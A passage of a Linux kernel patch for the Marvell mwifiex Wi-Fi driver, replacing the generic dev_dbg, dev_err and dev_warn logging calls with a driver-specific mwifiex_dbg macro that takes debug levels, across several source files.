adapter->cmd_sent); + + mwifiex_dbg(adapter, MSG, + "ps_mode=%d ps_state=%d\n", + adapter->ps_mode, adapter->ps_state); if (cmd_node->wait_q_enabled) { adapter->cmd_wait_q.status = -ETIMEDOUT; @@ -1022,7 +1060,7 @@ mwifiex_cancel_all_pending_cmd(struct mwifiex_adapter *adapter) if (!priv) continue; if (priv->scan_request) { - dev_dbg(adapter->dev, "info: aborting scan\n"); + mwifiex_dbg(adapter, WARN, "info: aborting scan\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; } @@ -1082,7 +1120,7 @@ mwifiex_cancel_pending_ioctl(struct mwifiex_adapter *adapter) if (!priv) continue; if (priv->scan_request) { - dev_dbg(adapter->dev, "info: aborting scan\n"); + mwifiex_dbg(adapter, WARN, "info: aborting scan\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; } @@ -1107,11 +1145,11 @@ mwifiex_check_ps_cond(struct mwifiex_adapter *adapter) !adapter->curr_cmd && !IS_CARD_RX_RCVD(adapter)) mwifiex_dnld_sleep_confirm_cmd(adapter); else - dev_dbg(adapter->dev, - "cmd: Delay Sleep Confirm (%s%s%s)\n", - (adapter->cmd_sent) ? "D" : "", - (adapter->curr_cmd) ? "C" : "", - (IS_CARD_RX_RCVD(adapter)) ? "R" : ""); + mwifiex_dbg(adapter, CMD, + "cmd: Delay Sleep Confirm (%s%s%s)\n", + (adapter->cmd_sent) ? "D" : "", + (adapter->curr_cmd) ? "C" : "", + (IS_CARD_RX_RCVD(adapter)) ? "R" : ""); } /* @@ -1127,15 +1165,18 @@ mwifiex_hs_activated_event(struct mwifiex_private *priv, u8 activated) priv->adapter->hs_activated = true; mwifiex_update_rxreor_flags(priv->adapter, RXREOR_FORCE_NO_DROP); - dev_dbg(priv->adapter->dev, "event: hs_activated\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: hs_activated\n"); priv->adapter->hs_activate_wait_q_woken = true; wake_up_interruptible( &priv->adapter->hs_activate_wait_q); } else { - dev_dbg(priv->adapter->dev, "event: HS not configured\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: HS not configured\n"); } } else { - dev_dbg(priv->adapter->dev, "event: hs_deactivated\n"); + mwifiex_dbg(priv->adapter, EVENT, + "event: hs_deactivated\n"); priv->adapter->hs_activated = false; } } @@ -1163,11 +1204,12 @@ int mwifiex_ret_802_11_hs_cfg(struct mwifiex_private *priv, mwifiex_hs_activated_event(priv, true); return 0; } else { - dev_dbg(adapter->dev, "cmd: CMD_RESP: HS_CFG cmd reply" - " result=%#x, conditions=0x%x gpio=0x%x gap=0x%x\n", - resp->result, conditions, - phs_cfg->params.hs_config.gpio, - phs_cfg->params.hs_config.gap); + mwifiex_dbg(adapter, CMD, + "cmd: CMD_RESP: HS_CFG cmd reply\t" + " result=%#x, conditions=0x%x gpio=0x%x gap=0x%x\n", + resp->result, conditions, + phs_cfg->params.hs_config.gpio, + phs_cfg->params.hs_config.gap); } if (conditions != HS_CFG_CANCEL) { adapter->is_hs_configured = true; @@ -1189,8 +1231,10 @@ int mwifiex_ret_802_11_hs_cfg(struct mwifiex_private *priv, void mwifiex_process_hs_config(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "info: %s: auto cancelling host sleep" - " since there is interrupt from the firmware\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: auto cancelling host sleep\t" + "since there is interrupt from the firmware\n", + __func__); adapter->if_ops.wakeup(adapter); adapter->hs_activated = false; @@ -1219,13 +1263,14 @@ mwifiex_process_sleep_confirm_resp(struct mwifiex_adapter *adapter, uint16_t seq_num = le16_to_cpu(cmd->seq_num); if (!upld_len) { - dev_err(adapter->dev, "%s: cmd size is 0\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: cmd size is 0\n", __func__); return; } - dev_dbg(adapter->dev, - "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", - command, result, le16_to_cpu(cmd->size), seq_num); + mwifiex_dbg(adapter, CMD, + "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", + command, result, le16_to_cpu(cmd->size), seq_num); /* Get BSS number and corresponding priv */ priv = mwifiex_get_priv_by_id(adapter, HostCmd_GET_BSS_NO(seq_num), @@ -1239,15 +1284,16 @@ mwifiex_process_sleep_confirm_resp(struct mwifiex_adapter *adapter, command &= HostCmd_CMD_ID_MASK; if (command != HostCmd_CMD_802_11_PS_MODE_ENH) { - dev_err(adapter->dev, - "%s: rcvd unexpected resp for cmd %#x, result = %x\n", - __func__, command, result); + mwifiex_dbg(adapter, ERROR, + "%s: rcvd unexpected resp for cmd %#x, result = %x\n", + __func__, command, result); return; } if (result) { - dev_err(adapter->dev, "%s: sleep confirm cmd failed\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: sleep confirm cmd failed\n", + __func__); adapter->pm_wakeup_card_req = false; adapter->ps_state = PS_STATE_AWAKE; return; @@ -1312,7 +1358,8 @@ int mwifiex_cmd_enh_power_mode(struct mwifiex_private *priv, sizeof(struct mwifiex_ie_types_header)); cmd_size += sizeof(*ps_tlv); tlv += sizeof(*ps_tlv); - dev_dbg(adapter->dev, "cmd: PS Command: Enter PS\n"); + mwifiex_dbg(priv->adapter, CMD, + "cmd: PS Command: Enter PS\n"); ps_mode->null_pkt_interval = cpu_to_le16(adapter->null_pkt_interval); ps_mode->multiple_dtims = @@ -1342,8 +1389,8 @@ int mwifiex_cmd_enh_power_mode(struct mwifiex_private *priv, tlv += sizeof(*auto_ds_tlv); if (auto_ds) idletime = auto_ds->idle_time; - dev_dbg(priv->adapter->dev, - "cmd: PS Command: Enter Auto Deep Sleep\n"); + mwifiex_dbg(priv->adapter, CMD, + "cmd: PS Command: Enter Auto Deep Sleep\n"); auto_ds_tlv->deep_sleep_timeout = cpu_to_le16(idletime); } cmd->size = cpu_to_le16(cmd_size); @@ -1370,27 +1417,31 @@ int mwifiex_ret_enh_power_mode(struct mwifiex_private *priv, uint16_t auto_ps_bitmap = le16_to_cpu(ps_mode->params.ps_bitmap); - dev_dbg(adapter->dev, - "info: %s: PS_MODE cmd reply result=%#x action=%#X\n", - __func__, resp->result, action); + mwifiex_dbg(adapter, INFO, + "info: %s: PS_MODE cmd reply result=%#x action=%#X\n", + __func__, resp->result, action); if (action == EN_AUTO_PS) { if (auto_ps_bitmap & BITMAP_AUTO_DS) { - dev_dbg(adapter->dev, "cmd: Enabled auto deep sleep\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Enabled auto deep sleep\n"); priv->adapter->is_deep_sleep = true; } if (auto_ps_bitmap & BITMAP_STA_PS) { - dev_dbg(adapter->dev, "cmd: Enabled STA power save\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Enabled STA power save\n"); if (adapter->sleep_period.period) - dev_dbg(adapter->dev, - "cmd: set to uapsd/pps mode\n"); + mwifiex_dbg(adapter, CMD, + "cmd: set to uapsd/pps mode\n"); } } else if (action == DIS_AUTO_PS) { if (ps_bitmap & BITMAP_AUTO_DS) { priv->adapter->is_deep_sleep = false; - dev_dbg(adapter->dev, "cmd: Disabled auto deep sleep\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Disabled auto deep sleep\n"); } if (ps_bitmap & BITMAP_STA_PS) { - dev_dbg(adapter->dev, "cmd: Disabled STA power save\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Disabled STA power save\n"); if (adapter->sleep_period.period) { adapter->delay_null_pkt = false; adapter->tx_lock_flag = false; @@ -1403,7 +1454,8 @@ int mwifiex_ret_enh_power_mode(struct mwifiex_private *priv, else adapter->ps_mode = MWIFIEX_802_11_POWER_MODE_CAM; - dev_dbg(adapter->dev, "cmd: ps_bitmap=%#x\n", ps_bitmap); + mwifiex_dbg(adapter, CMD, + "cmd: ps_bitmap=%#x\n", ps_bitmap); if (pm_cfg) { /* This section is for get power save mode */ @@ -1540,29 +1592,29 @@ int mwifiex_ret_get_hw_spec(struct mwifiex_private *priv, api_rev->major_ver; adapter->key_api_minor_ver = api_rev->minor_ver; - dev_dbg(adapter->dev, - "key_api v%d.%d\n", - adapter->key_api_major_ver, - adapter->key_api_minor_ver); + mwifiex_dbg(adapter, INFO, + "key_api v%d.%d\n", + adapter->key_api_major_ver, + adapter->key_api_minor_ver); break; case FW_API_VER_ID: adapter->fw_api_ver = api_rev->major_ver; - dev_dbg(adapter->dev, - "Firmware api version %d\n", - adapter->fw_api_ver); + mwifiex_dbg(adapter, INFO, + "Firmware api version %d\n", + adapter->fw_api_ver); break; default: - dev_warn(adapter->dev, - "Unknown api_id: %d\n", - api_id); + mwifiex_dbg(adapter, FATAL, + "Unknown api_id: %d\n", + api_id); break; } break; default: - dev_warn(adapter->dev, - "Unknown GET_HW_SPEC TLV type: %#x\n", - le16_to_cpu(tlv->type)); + mwifiex_dbg(adapter, FATAL, + "Unknown GET_HW_SPEC TLV type: %#x\n", + le16_to_cpu(tlv->type)); break; } parsed_len += le16_to_cpu(tlv->len) + @@ -1572,14 +1624,16 @@ int mwifiex_ret_get_hw_spec(struct mwifiex_private *priv, } } - dev_dbg(adapter->dev, "info: GET_HW_SPEC: fw_release_number- %#x\n", - adapter->fw_release_number); - dev_dbg(adapter->dev, "info: GET_HW_SPEC: permanent addr: %pM\n", - hw_spec->permanent_addr); - dev_dbg(adapter->dev, - "info: GET_HW_SPEC: hw_if_version=%#x version=%#x\n", - le16_to_cpu(hw_spec->hw_if_version), - le16_to_cpu(hw_spec->version)); + mwifiex_dbg(adapter, INFO, + "info: GET_HW_SPEC: fw_release_number- %#x\n", + adapter->fw_release_number); + mwifiex_dbg(adapter, INFO, + "info: GET_HW_SPEC: permanent addr: %pM\n", + hw_spec->permanent_addr); + mwifiex_dbg(adapter, INFO, + "info: GET_HW_SPEC: hw_if_version=%#x version=%#x\n", + le16_to_cpu(hw_spec->hw_if_version), + le16_to_cpu(hw_spec->version)); ether_addr_copy(priv->adapter->perm_addr, hw_spec->permanent_addr); adapter->region_code = le16_to_cpu(hw_spec->region_code); @@ -1592,8 +1646,8 @@ int mwifiex_ret_get_hw_spec(struct mwifiex_private *priv, /* If it's unidentified region code, use the default (USA) */ if (i >= MWIFIEX_MAX_REGION_CODE) { adapter->region_code = 0x10; - dev_dbg(adapter->dev, - "cmd: unknown region code, use default (USA)\n"); + mwifiex_dbg(adapter, WARN, + "cmd: unknown region code, use default (USA)\n"); } adapter->hw_dot_11n_dev_cap = le32_to_cpu(hw_spec->dot_11n_dev_cap); diff --git a/drivers/net/wireless/mwifiex/debugfs.c b/drivers/net/wireless/mwifiex/debugfs.c index f3e19e917949..8895906b300e 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -792,7 +792,8 @@ mwifiex_hscfg_write(struct file *file, const char __user *ubuf, memset(&hscfg, 0, sizeof(struct mwifiex_ds_hs_cfg)); if (arg_num > 3) { - dev_err(priv->adapter->dev, "Too many arguments\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Too many arguments\n"); ret = -EINVAL; goto done; } diff --git a/drivers/net/wireless/mwifiex/ethtool.c b/drivers/net/wireless/mwifiex/ethtool.c index 65d8d6d4b6ba..a6b3b41d5909 100644 --- a/drivers/net/wireless/mwifiex/ethtool.c +++ b/drivers/net/wireless/mwifiex/ethtool.c @@ -108,7 +108,8 @@ mwifiex_get_dump_data(struct net_device *dev, struct ethtool_dump *dump, } if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - dev_err(adapter->dev, "firmware dump in progress!!\n"); + mwifiex_dbg(adapter, ERROR, + "firmware dump in progress!!\n"); return -EBUSY; } @@ -140,7 +141,8 @@ static int mwifiex_set_dump(struct net_device *dev, struct ethtool_dump *val) } if (adapter->curr_mem_idx == MWIFIEX_FW_DUMP_IDX) { - dev_err(adapter->dev, "firmware dump in progress!!\n"); + mwifiex_dbg(adapter, ERROR, + "firmware dump in progress!!\n"); return -EBUSY; } diff --git a/drivers/net/wireless/mwifiex/init.c b/drivers/net/wireless/mwifiex/init.c index e12192f5cfad..fdf38d06a0aa 100644 --- a/drivers/net/wireless/mwifiex/init.c +++ b/drivers/net/wireless/mwifiex/init.c @@ -56,7 +56,7 @@ static void wakeup_timer_fn(unsigned long data) { struct mwifiex_adapter *adapter = (struct mwifiex_adapter *)data; - dev_err(adapter->dev, "Firmware wakeup failed\n"); + mwifiex_dbg(adapter, ERROR, "Firmware wakeup failed\n"); adapter->hw_status = MWIFIEX_HW_STATUS_RESET; mwifiex_cancel_all_pending_cmd(adapter); @@ -172,8 +172,9 @@ static int mwifiex_allocate_adapter(struct mwifiex_adapter *adapter) /* Allocate command buffer */ ret = mwifiex_alloc_cmd_buffer(adapter); if (ret) { - dev_err(adapter->dev, "%s: failed to alloc cmd buffer\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to alloc cmd buffer\n", + __func__); return -1; } @@ -182,8 +183,9 @@ static int mwifiex_allocate_adapter(struct mwifiex_adapter *adapter) + INTF_HEADER_LEN); if (!adapter->sleep_cfm) { - dev_err(adapter->dev, "%s: failed to alloc sleep cfm" - " cmd buffer\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to alloc sleep cfm\t" + " cmd buffer\n", __func__); return -1; } skb_reserve(adapter->sleep_cfm, INTF_HEADER_LEN); @@ -417,7 +419,7 @@ mwifiex_adapter_cleanup(struct mwifiex_adapter *adapter) mwifiex_free_lock_list(adapter); /* Free command buffer */ - dev_dbg(adapter->dev, "info: free cmd buffer\n"); + mwifiex_dbg(adapter, INFO, "info: free cmd buffer\n"); mwifiex_free_cmd_buffer(adapter); for (idx = 0; idx < adapter->num_mem_types; idx++) { @@ -595,10 +597,11 @@ static void mwifiex_delete_bss_prio_tbl(struct mwifiex_private *priv) for (i = 0; i < adapter->priv_num; ++i) { head = &adapter->bss_prio_tbl[i].bss_prio_head; lock = &adapter->bss_prio_tbl[i].bss_prio_lock; - dev_dbg(adapter->dev, "info: delete BSS priority table," - " bss_type = %d, bss_num = %d, i = %d," - " head = %p\n", - priv->bss_type, priv->bss_num, i, head); + mwifiex_dbg(adapter, INFO, + "info: delete BSS priority table,\t" + "bss_type = %d, bss_num = %d, i = %d,\t" + "head = %p\n", + priv->bss_type, priv->bss_num, i, head); { spin_lock_irqsave(lock, flags); @@ -609,9 +612,10 @@ static void mwifiex_delete_bss_prio_tbl(struct mwifiex_private *priv) list_for_each_entry_safe(bssprio_node, tmp_node, head, list) { if (bssprio_node->priv == priv) { - dev_dbg(adapter->dev, "info: Delete " - "node %p, next = %p\n", - bssprio_node, tmp_node); + mwifiex_dbg(adapter, INFO, + "info: Delete\t" + "node %p, next = %p\n", + bssprio_node, tmp_node); list_del(&bssprio_node->list); kfree(bssprio_node); } @@ -659,20 +663,23 @@ mwifiex_shutdown_drv(struct mwifiex_adapter *adapter) adapter->hw_status = MWIFIEX_HW_STATUS_CLOSING; /* wait for mwifiex_process to complete */ if (adapter->mwifiex_processing) { - dev_warn(adapter->dev, "main process is still running\n"); + mwifiex_dbg(adapter, WARN, + "main process is still running\n"); return ret; } /* cancel current command */ if (adapter->curr_cmd) { - dev_warn(adapter->dev, "curr_cmd is still in processing\n"); + mwifiex_dbg(adapter, WARN, + "curr_cmd is still in processing\n"); del_timer_sync(&adapter->cmd_timer); mwifiex_recycle_cmd_node(adapter, adapter->curr_cmd); adapter->curr_cmd = NULL; } /* shut down mwifiex */ - dev_dbg(adapter->dev, "info: shutdown mwifiex...\n"); + mwifiex_dbg(adapter, MSG, + "info: shutdown mwifiex...\n"); /* Clean up Tx/Rx queues and delete BSS priority table */ for (i = 0; i < adapter->priv_num; i++) { @@ -741,8 +748,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* check if firmware is already running */ ret = adapter->if_ops.check_fw_status(adapter, poll_num); if (!ret) { - dev_notice(adapter->dev, - "WLAN FW already running! Skip FW dnld\n"); + mwifiex_dbg(adapter, MSG, + "WLAN FW already running! Skip FW dnld\n"); return 0; } @@ -750,8 +757,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* check if we are the winner for downloading FW */ if (!adapter->winner) { - dev_notice(adapter->dev, - "FW already running! Skip FW dnld\n"); + mwifiex_dbg(adapter, MSG, + "FW already running! Skip FW dnld\n"); goto poll_fw; } } @@ -760,7 +767,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* Download firmware with helper */ ret = adapter->if_ops.prog_fw(adapter, pmfw); if (ret) { - dev_err(adapter->dev, "prog_fw failed ret=%#x\n", ret); + mwifiex_dbg(adapter, ERROR, + "prog_fw failed ret=%#x\n", ret); return ret; } } @@ -769,7 +777,8 @@ int mwifiex_dnld_fw(struct mwifiex_adapter *adapter, /* Check if the firmware is downloaded successfully or not */ ret = adapter->if_ops.check_fw_status(adapter, poll_num); if (ret) - dev_err(adapter->dev, "FW failed to be active in time\n"); + mwifiex_dbg(adapter, ERROR, + "FW failed to be active in time\n"); return ret; } diff --git a/drivers/net/wireless/mwifiex/join.c b/drivers/net/wireless/mwifiex/join.c index f214a7cd1345..6208ef1f589a 100644 --- a/drivers/net/wireless/mwifiex/join.c +++ b/drivers/net/wireless/mwifiex/join.c @@ -53,9 +53,9 @@ mwifiex_cmd_append_generic_ie(struct mwifiex_private *priv, u8 **buffer) * parameter buffer pointer. */ if (priv->gen_ie_buf_len) { - dev_dbg(priv->adapter->dev, - "info: %s: append generic ie len %d to %p\n", - __func__, priv->gen_ie_buf_len, *buffer); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: append generic ie len %d to %p\n", + __func__, priv->gen_ie_buf_len, *buffer); /* Wrap the generic IE buffer with a pass through TLV type */ ie_header.type = cpu_to_le16(TLV_TYPE_PASSTHROUGH); @@ -125,9 +125,9 @@ mwifiex_cmd_append_tsf_tlv(struct mwifiex_private *priv, u8 **buffer, tsf_val = cpu_to_le64(bss_desc->timestamp); - dev_dbg(priv->adapter->dev, - "info: %s: TSF offset calc: %016llx - %016llx\n", - __func__, bss_desc->timestamp, bss_desc->fw_tsf); + mwifiex_dbg(priv->adapter, INFO, + "info: %s: TSF offset calc: %016llx - %016llx\n", + __func__, bss_desc->timestamp, bss_desc->fw_tsf); memcpy(*buffer, &tsf_val, sizeof(tsf_val)); *buffer += sizeof(tsf_val); @@ -152,7 +152,7 @@ static int mwifiex_get_common_rates(struct mwifiex_private *priv, u8 *rate1, tmp = kmemdup(rate1, rate1_size, GFP_KERNEL); if (!tmp) { - dev_err(priv->adapter->dev, "failed to alloc tmp buf\n"); + mwifiex_dbg(priv->adapter, ERROR, "failed to alloc tmp buf\n"); return -ENOMEM; } @@ -169,8 +169,8 @@ static int mwifiex_get_common_rates(struct mwifiex_private *priv, u8 *rate1, } } - dev_dbg(priv->adapter->dev, "info: Tx data rate set to %#x\n", - priv->data_rate); + mwifiex_dbg(priv->adapter, INFO, "info: Tx data rate set to %#x\n", + priv->data_rate); if (!priv->is_data_rate_auto) { while (*ptr) { @@ -180,9 +180,10 @@ static int mwifiex_get_common_rates(struct mwifiex_private *priv, u8 *rate1, } ptr++; } - dev_err(priv->adapter->dev, "previously set fixed data rate %#x" - " is not compatible with the network\n", - priv->data_rate); + mwifiex_dbg(priv->adapter, ERROR, + "previously set fixed data rate %#x\t" + "is not compatible with the network\n", + priv->data_rate); ret = -1; goto done; @@ -214,8 +215,9 @@ mwifiex_setup_rates_from_bssdesc(struct mwifiex_private *priv, if (mwifiex_get_common_rates(priv, out_rates, MWIFIEX_SUPPORTED_RATES, card_rates, card_rates_size)) { *out_rates_size = 0; - dev_err(priv->adapter->dev, "%s: cannot get common rates\n", - __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: cannot get common rates\n", + __func__); return -1; } @@ -246,8 +248,9 @@ mwifiex_cmd_append_wps_ie(struct mwifiex_private *priv, u8 **buffer) * parameter buffer pointer. */ if (priv->wps_ie_len) { - dev_dbg(priv->adapter->dev, "cmd: append wps ie %d to %p\n", - priv->wps_ie_len, *buffer); + mwifiex_dbg(priv->adapter, CMD, + "cmd: append wps ie %d to %p\n", + priv->wps_ie_len, *buffer); /* Wrap the generic IE buffer with a pass through TLV type */ ie_header.type = cpu_to_le16(TLV_TYPE_MGMT_IE); @@ -292,8 +295,9 @@ mwifiex_cmd_append_wapi_ie(struct mwifiex_private *priv, u8 **buffer) * parameter buffer pointer. */ if (priv->wapi_ie_len) { - dev_dbg(priv->adapter->dev, "cmd: append wapi ie %d to %p\n", - priv->wapi_ie_len, *buffer); + mwifiex_dbg(priv->adapter, CMD, + "cmd: append wapi ie %d to %p\n", + priv->wapi_ie_len, *buffer); /* Wrap the generic IE buffer with a pass through TLV type */ ie_header.type = cpu_to_le16(TLV_TYPE_WAPI_IE); @@ -453,8 +457,8 @@ int mwifiex_cmd_802_11_associate(struct mwifiex_private *priv, rates_tlv->header.len = cpu_to_le16((u16) rates_size); memcpy(rates_tlv->rates, rates, rates_size); pos += sizeof(rates_tlv->header) + rates_size; - dev_dbg(priv->adapter->dev, "info: ASSOC_CMD: rates size = %d\n", - rates_size); + mwifiex_dbg(priv->adapter, INFO, "info: ASSOC_CMD: rates size = %d\n", + rates_size); /* Add the Authentication type to be used for Auth frames */ auth_tlv = (struct mwifiex_ie_types_auth_type *) pos; @@ -487,14 +491,14 @@ int mwifiex_cmd_802_11_associate(struct mwifiex_private *priv, sizeof(struct mwifiex_chan_scan_param_set)); chan_tlv->chan_scan_param[0].chan_number = (bss_desc->phy_param_set.ds_param_set.current_chan); - dev_dbg(priv->adapter->dev, "info: Assoc: TLV Chan = %d\n", - chan_tlv->chan_scan_param[0].chan_number); + mwifiex_dbg(priv->adapter, INFO, "info: Assoc: TLV Chan = %d\n", + chan_tlv->chan_scan_param[0].chan_number); chan_tlv->chan_scan_param[0].radio_type = mwifiex_band_to_radio_type((u8) bss_desc->bss_band); - dev_dbg(priv->adapter->dev, "info: Assoc: TLV Band = %d\n", - chan_tlv->chan_scan_param[0].radio_type); + mwifiex_dbg(priv->adapter, INFO, "info: Assoc: TLV Band = %d\n", + chan_tlv->chan_scan_param[0].radio_type); pos += sizeof(chan_tlv->header) + sizeof(struct mwifiex_chan_scan_param_set); } @@ -544,8 +548,9 @@ int mwifiex_cmd_802_11_associate(struct mwifiex_private *priv, tmp_cap &= ~WLAN_CAPABILITY_SHORT_SLOT_TIME; tmp_cap &= CAPINFO_MASK; - dev_dbg(priv->adapter->dev, "info: ASSOC_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", - tmp_cap, CAPINFO_MASK); + mwifiex_dbg(priv->adapter, INFO, + "info: ASSOC_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", + tmp_cap, CAPINFO_MASK); assoc->cap_info_bitmap = cpu_to_le16(tmp_cap); return 0; @@ -645,9 +650,11 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, if (status_code) { priv->adapter->dbg.num_cmd_assoc_failure++; - dev_err(priv->adapter->dev, - "ASSOC_RESP: failed, status code=%d err=%#x a_id=%#x\n", - status_code, cap_info, le16_to_cpu(assoc_rsp->a_id)); + mwifiex_dbg(priv->adapter, ERROR, + "ASSOC_RESP: failed,\t" + "status code=%d err=%#x a_id=%#x\n", + status_code, cap_info, + le16_to_cpu(assoc_rsp->a_id)); if (cap_info == MWIFIEX_TIMEOUT_FOR_AP_RESP) { if (status_code == MWIFIEX_STATUS_CODE_AUTH_TIMEOUT) @@ -671,8 +678,8 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, /* Set the attempted BSSID Index to current */ bss_desc = priv->attempted_bss_desc; - dev_dbg(priv->adapter->dev, "info: ASSOC_RESP: %s\n", - bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, "info: ASSOC_RESP: %s\n", + bss_desc->ssid.ssid); /* Make a copy of current BSSID descriptor */ memcpy(&priv->curr_bss_params.bss_descriptor, @@ -702,8 +709,9 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, = ((bss_desc->wmm_ie.qos_info_bitmap & IEEE80211_WMM_IE_AP_QOSINFO_UAPSD) ? 1 : 0); - dev_dbg(priv->adapter->dev, "info: ASSOC_RESP: curr_pkt_filter is %#x\n", - priv->curr_pkt_filter); + mwifiex_dbg(priv->adapter, INFO, + "info: ASSOC_RESP: curr_pkt_filter is %#x\n", + priv->curr_pkt_filter); if (priv->sec_info.wpa_enabled || priv->sec_info.wpa2_enabled) priv->wpa_is_gtk_set = false; @@ -719,8 +727,8 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, } if (enable_data) - dev_dbg(priv->adapter->dev, - "info: post association, re-enabling data flow\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: post association, re-enabling data flow\n"); /* Reset SNR/NF/RSSI values */ priv->data_rssi_last = 0; @@ -738,7 +746,7 @@ int mwifiex_ret_802_11_associate(struct mwifiex_private *priv, priv->adapter->dbg.num_cmd_assoc_success++; - dev_dbg(priv->adapter->dev, "info: ASSOC_RESP: associated\n"); + mwifiex_dbg(priv->adapter, INFO, "info: ASSOC_RESP: associated\n"); /* Add the ra_list here for infra mode as there will be only 1 ra always */ @@ -825,8 +833,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, memcpy(adhoc_start->ssid, req_ssid->ssid, req_ssid->ssid_len); - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: SSID = %s\n", - adhoc_start->ssid); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: SSID = %s\n", + adhoc_start->ssid); memset(bss_desc->ssid.ssid, 0, IEEE80211_MAX_SSID_LEN); memcpy(bss_desc->ssid.ssid, req_ssid->ssid, req_ssid->ssid_len); @@ -858,12 +866,14 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, } if (!priv->adhoc_channel) { - dev_err(adapter->dev, "ADHOC_S_CMD: adhoc_channel cannot be 0\n"); + mwifiex_dbg(adapter, ERROR, + "ADHOC_S_CMD: adhoc_channel cannot be 0\n"); return -1; } - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: creating ADHOC on channel %d\n", - priv->adhoc_channel); + mwifiex_dbg(adapter, INFO, + "info: ADHOC_S_CMD: creating ADHOC on channel %d\n", + priv->adhoc_channel); priv->curr_bss_params.bss_descriptor.channel = priv->adhoc_channel; priv->curr_bss_params.band = adapter->adhoc_start_band; @@ -895,13 +905,14 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, /* Set up privacy in bss_desc */ if (priv->sec_info.encryption_mode) { /* Ad-Hoc capability privacy on */ - dev_dbg(adapter->dev, - "info: ADHOC_S_CMD: wep_status set privacy to WEP\n"); + mwifiex_dbg(adapter, INFO, + "info: ADHOC_S_CMD: wep_status set privacy to WEP\n"); bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_8021X_WEP; tmp_cap |= WLAN_CAPABILITY_PRIVACY; } else { - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: wep_status NOT set," - " setting privacy to ACCEPT ALL\n"); + mwifiex_dbg(adapter, INFO, + "info: ADHOC_S_CMD: wep_status NOT set,\t" + "setting privacy to ACCEPT ALL\n"); bss_desc->privacy = MWIFIEX_802_11_PRIV_FILTER_ACCEPT_ALL; } @@ -912,8 +923,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, if (mwifiex_send_cmd(priv, HostCmd_CMD_MAC_CONTROL, HostCmd_ACT_GEN_SET, 0, &priv->curr_pkt_filter, false)) { - dev_err(adapter->dev, - "ADHOC_S_CMD: G Protection config failed\n"); + mwifiex_dbg(adapter, ERROR, + "ADHOC_S_CMD: G Protection config failed\n"); return -1; } } @@ -928,10 +939,10 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, memcpy(&priv->curr_bss_params.data_rates, &adhoc_start->data_rate, priv->curr_bss_params.num_of_rates); - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: rates=%4ph\n", - adhoc_start->data_rate); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: rates=%4ph\n", + adhoc_start->data_rate); - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: AD-HOC Start command is ready\n"); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: AD-HOC Start command is ready\n"); if (IS_SUPPORT_MULTI_BANDS(adapter)) { /* Append a channel TLV */ @@ -945,8 +956,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, chan_tlv->chan_scan_param[0].chan_number = (u8) priv->curr_bss_params.bss_descriptor.channel; - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: TLV Chan = %d\n", - chan_tlv->chan_scan_param[0].chan_number); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: TLV Chan = %d\n", + chan_tlv->chan_scan_param[0].chan_number); chan_tlv->chan_scan_param[0].radio_type = mwifiex_band_to_radio_type(priv->curr_bss_params.band); @@ -961,8 +972,8 @@ mwifiex_cmd_802_11_ad_hoc_start(struct mwifiex_private *priv, chan_tlv->chan_scan_param[0].radio_type |= (IEEE80211_HT_PARAM_CHA_SEC_BELOW << 4); } - dev_dbg(adapter->dev, "info: ADHOC_S_CMD: TLV Band = %d\n", - chan_tlv->chan_scan_param[0].radio_type); + mwifiex_dbg(adapter, INFO, "info: ADHOC_S_CMD: TLV Band = %d\n", + chan_tlv->chan_scan_param[0].radio_type); pos += sizeof(chan_tlv->header) + sizeof(struct mwifiex_chan_scan_param_set); cmd_append_size += @@ -1084,8 +1095,8 @@ mwifiex_cmd_802_11_ad_hoc_join(struct mwifiex_private *priv, if (mwifiex_send_cmd(priv, 